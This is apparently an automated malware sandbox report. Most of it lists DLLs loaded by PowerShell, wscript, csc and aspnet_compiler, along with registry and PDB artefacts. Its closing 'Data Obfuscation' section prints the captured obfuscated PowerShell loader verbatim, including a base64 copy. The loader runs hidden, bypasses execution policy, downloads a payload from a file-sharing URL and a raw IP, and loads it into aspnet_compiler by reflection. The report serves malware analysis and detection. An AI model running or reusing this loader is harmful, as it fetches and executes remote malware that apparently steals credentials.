Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2376307590.0000000006750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2085425076.0000000007052000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2088188636.0000000007F98000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: 31437F.exe.11.dr
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.pdb source: powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2376307590.0000000006750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"
